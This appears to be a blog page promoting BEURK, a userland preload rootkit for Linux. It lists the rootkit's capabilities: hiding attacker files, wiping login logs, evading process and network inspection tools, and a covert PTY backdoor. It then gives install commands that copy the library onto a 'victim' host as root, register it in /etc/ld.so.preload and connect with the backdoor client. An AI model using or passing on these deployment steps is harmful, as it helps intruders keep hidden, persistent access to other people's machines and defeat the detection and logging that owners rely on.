BEURK — Experimental Unix RootKit
BEURK is an userland preload rootkit for GNU/Linux, heavily focused around anti-debugging and anti-detection.
[adsense size='1']
Features
- Hide attacker files and directories
- Realtime log cleanup (on utmp/wtmp)
- Anti process and login detection
- Bypass unhide, lsof, ps, ldd, netstat analysis
- Furtive PTY backdoor client
Upcoming features
- ptrace(2) hooking for anti-debugging
- libpcap hooking undermines local sniffers
- PAM backdoor for local privilege escalation
Usage
- Compile
git clone https://github.com/unix-thrust/beurk.git
cd beurk
make
- Install
scp libselinux.so root@victim.com:/lib/
ssh root@victim.com 'echo /lib/libselinux.so >> /etc/ld.so.preload'
- Enjoy !
./client.py victim_ip:port # connect with furtive backdoor
Dependencies
The following packages are not required in order to build BEURK at the moment:
- libpcap โ to avoid local sniffing
- libpam โ for local PAM backdoor
- libssl โ for encrypted backdoor connection
Example on debian:
apt-get install libpcap-dev libpam-dev libssl-dev
[adsense size='1']
Installing BEURK
su -
git clone git@github.com:unix-thrust/beurk.git
cd beurk
./build beurk.conf
mv libselinux.so /lib
echo "/lib/libselinux.so" > /etc/ld.so.preload
Experimental Unix RootKit: BEURK
[adsense size='1']
Gloss